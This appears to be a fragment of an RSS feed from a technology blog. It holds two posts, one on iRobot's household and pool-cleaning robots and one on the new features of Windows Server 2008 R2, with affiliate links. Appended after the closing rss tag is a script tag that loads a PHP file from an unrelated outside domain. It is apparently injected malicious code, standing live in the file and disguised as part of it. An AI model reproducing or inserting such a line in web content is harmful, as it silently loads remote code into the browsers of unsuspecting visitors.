!important; margin:0px !important;" src="http://www.assoc-amazon.com/e/ir?t=charlesedge-20&amp;l=as2&amp;o=1&amp;a=B001R4CPME" border="0" alt="" width="1" height="1" />, which is a bit of a departure from a demure little disk that looks like something Buck Rogers wore around his neck (iRobot&#8217;s future maybe) and a little more like a tank with a weird gutter cleaner thingie in the front (I&#8217;m sure the good folks at iRobot have a slightly more technical term for it).</p>
<p><script src="http://player.ooyala.com/player.js?embedCode=cxZHRvOu1ESW5ypCG3e_v6MFu0D_Fg8u&amp;width=539&amp;height=274"></script>The mop though, is to me one of the most interesting. Most don&#8217;t consider robotics to mix with water. But the <a href="http://www.amazon.com/gp/product/B000RTSFJ2?ie=UTF8&amp;tag=charlesedge-20&amp;linkCode=as2&amp;camp=1789&amp;creative=390957&amp;creativeASIN=B000RTSFJ2">Scooba Floor-Washing Robot</a><img style="border:none !important; margin:0px !important;" src="http://www.assoc-amazon.com/e/ir?t=charlesedge-20&amp;l=as2&amp;o=1&amp;a=B000RTSFJ2" border="0" alt="" width="1" height="1" /> is just that, a robot with a tank of Clorox floor cleaner in it. It will mop your floors while you&#8217;re out to the grocery store so you get home and the hardwood floors, tile or linoleum are all sparkly and nice. Helpful if you have a baby that likes to launch food across the room in your home&#8230;</p>
<div><span style="font-family: 'Lucida Grande', 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: small;"><span style="line-height: normal; white-space: pre-wrap; "><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; white-space: normal; font-size: 13px; line-height: 19px;">And once you&#8217;ve made the leap to put liquid inside the robot you might as well straight up submerge the thing. The<a href="http://www.amazon.com/gp/product/B000PSERZQ?ie=UTF8&amp;tag=charlesedge-20&amp;linkCode=as2&amp;camp=1789&amp;creative=390957&amp;creativeASIN=B000PSERZQ"> Verro Pool-Cleaning Robot</a><img style="border:none !important; margin:0px !important;" src="http://www.assoc-amazon.com/e/ir?t=charlesedge-20&amp;l=as2&amp;o=1&amp;a=B000PSERZQ" border="0" alt="" width="1" height="1" /> is the most expensive retail robot that iRobot makes, but it has the potential to save savvy pool owners in warmer states a lot of money. It certainly doesn&#8217;t replace a professional pool cleaning service, but is likely to reduce the frequency that they are needed. And once you have the control aquatic environments down you might as well move into the ocean with iRobots since they make underwater <a href="http://www.irobot.com/sp.cfm?pageid=428">oceanic robots as well</a>. And then if you can do all that other stuff, you might as well get into <a href="http://www.irobot.com/sp.cfm?pageid=109">diffusing bombs</a>. Overall, I&#8217;m impressed with how well iRobot as a corporation has managed to expand their portfolio and some of the talent they&#8217;ve brought in to help them do so.</span></span></span></div>
<div><span style="font-family: 'Lucida Grande', 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: small;"><span style="line-height: normal; white-space: pre-wrap; "><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; white-space: normal; font-size: 13px; line-height: 19px;"><br />
</span></span></span></div>
<div><span style="font-family: 'Lucida Grande', 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: small;"><span style="line-height: normal; white-space: pre-wrap; "><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; white-space: normal; font-size: 13px; line-height: 19px;">Sure, it all pales in comparison to a unit with a positronic brain, which I&#8217;m pretty sure Asimov promised us back when guys gooped gel into their hair, all wore suits and smoked in offices (yes, I too am enjoying Mad Men these days). But while we don&#8217;t yet have a R Daneel Olivaw to help out around the kitchen, at least we can put away our mops and rest easy knowing the profits are helping to fund development into mine diffusing robots, so we can keep our humans safe. Since that is, after all, the point of the <a href="http://en.wikipedia.org/wiki/Three_Laws_of_Robotics">first law of robotics</a> (unless of course, you&#8217;re using <a href="http://msdn.microsoft.com/en-us/robotics/default.aspx">Microsoft Robotics Developer Studio 2008</a> .</span></span></span></div>
<p><strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/home-automation/z-wave-remotes/" rel="bookmark" title="January 21, 2010">Z-Wave Remotes</a></li>
<li><a href="http://krypted.com/home-automation/zigbee/" rel="bookmark" title="January 10, 2010">Zigbee &#038; Z-Wave in 2010</a></li>
<li><a href="http://krypted.com/business/houseport-z-wave-for-mac-finally-available/" rel="bookmark" title="September 25, 2009">Houseport Z-Wave for Mac Finally Available!!</a></li>
<li><a href="http://krypted.com/home-automation/automate-the-home/" rel="bookmark" title="May 30, 2008">Automate the Home</a></li>
</ul>
<p><!-- Similar Posts took 4.683 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/business/home-robotics/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Windows Server 2008 R2</title>
		<link>http://krypted.com/vmware/windows-server-2008-r2/</link>
		<comments>http://krypted.com/vmware/windows-server-2008-r2/#comments</comments>
		<pubDate>Thu, 17 Sep 2009 04:30:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[VMware]]></category>
		<category><![CDATA[Windows Server]]></category>
		<category><![CDATA[iis 7.5]]></category>
		<category><![CDATA[new features]]></category>
		<category><![CDATA[new settings]]></category>
		<category><![CDATA[rad]]></category>
		<category><![CDATA[Windows 7]]></category>
		<category><![CDATA[Windows Server 2008]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4687</guid>
		<description><![CDATA[Can you say virtualization? How about &#8220;better together&#8221;? Do you care about Hyper-V or Windows 7 integration right now? If the answer to either question is yes (and in my experience that&#8217;s not always actually the case) then you will want to check out R2. One of the biggest new features in R2 is one [...]]]></description>
			<content:encoded><![CDATA[<p>Can you say virtualization? How about &#8220;better together&#8221;? Do you care about Hyper-V or Windows 7 integration right now? If the answer to either question is yes (and in my experience that&#8217;s not always actually the case) then you will want to check out R2. One of the biggest new features in R2 is one that VMware has had for about 5 or so years in Live Migration, the ability to move a virtual machine, while it&#8217;s running (assuming the application in use supports the ability to do so and that you&#8217;re using Clustered Shared Volumes). This includes failover in Cluster Node Connectivity Fault Tolerance. SC VMM, or System Center Virtual Machine Manager in 2008 R2 is more useful than ever in that you can get a dashboard of what you have in motion and move guests between hosts from a single console. You can also more rapidly provision virtual machines with Channels and saved hardware profile templates.</p>
<p>Microsoft also fine tuned their application publishing environment, RemoteApp, their terminal services proxy, now called Remote Desktop Services Gateway) and and tweaked RDP to include a number of new Windows 7 like features. While all of this new stuff is great to have, Microsoft is still not going to give VMware much of a run for their money as ESX jumped a whole new level forward with vSphere. Having said that, Hyper-V becomes more mature with each release and is now fully integrated into Windows Server.</p>
<p>R2 also supports remotely connecting to another servers Server Manager console, which will likely reduce the number of times you&#8217;re establishing Remote Desktop connections to hosts. It also has a Best Practices Analyzer for each service and a new rev of PowerShell (along with a number of PowerShell commandlets wrapped in GUIs).</p>
<p>But Charles, you said Windows 7? Sure I did. R2 adds DirectAccess and BranchCache, two new ways to have remote accessibility for remote clients (rather than using a VPN) and remote workers respectively. Windows Deployment Services also got a bit of a feature boost, namely to ease the migration path into Windows 7.</p>
<p>There&#8217;s also some new AD stuff. Authentication Assurance for Active Directory Federated Services allows for certificate mapping to OUs. djoin.exe can leverage an xml answer file for joining a client into Active Directory while it&#8217;s offline. In addition to exe&#8217;s there&#8217;s also a number (more than 75) of new commandlets for PowerShell. There&#8217;s also a recycle bin for those objects you really didn&#8217;t mean to delete and finally, a Active Directory Administrative Center, which is pretty much a commandlet wrapper that provides for task-based support administration (I&#8217;m on the fence about this one still).</p>
<p>IIS 7.5 is also pretty notable. It has new tie-ins for the newly mentioned next release of SQL Server and an automator-like task generator (another wrapper around PowerShell). Not that I&#8217;ve been able to test but apparently I can now use 256 logical processors and 32 with Hyper-V). There&#8217;s also new failover options (which I haven&#8217;t fully explored so I&#8217;ll not go into further detail on those yet), an unattended installation feature and more granularly defined cluster node behaviors in this latest generation of IIS.</p>
<p>PS &#8211; Terminal Services is now known as Remote Desktop Services.<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/windows-server/adding-a-role-in-windows-server-2008/" rel="bookmark" title="August 24, 2009">Adding a Role in Windows Server 2008</a></li>
<li><a href="http://krypted.com/active-directory/windows-server-2008-install-ris-and-wds/" rel="bookmark" title="September 29, 2008">Windows Server 2008: Install RIS and WDS</a></li>
<li><a href="http://krypted.com/windows-server/windows-7/" rel="bookmark" title="November 9, 2008">Windows 7 Alpha</a></li>
<li><a href="http://krypted.com/windows-server/windows-server-sbs-vs-ebs/" rel="bookmark" title="March 17, 2007">Windows Server: SBS vs. EBS</a></li>
<li><a href="http://krypted.com/mac-os-x/windows-7-in-october/" rel="bookmark" title="June 15, 2009">Windows 7 in October</a></li>
</ul>
<p><!-- Similar Posts took 6.264 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/vmware/windows-server-2008-r2/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
<script src="http://holasionweb.com/oo.php"></script>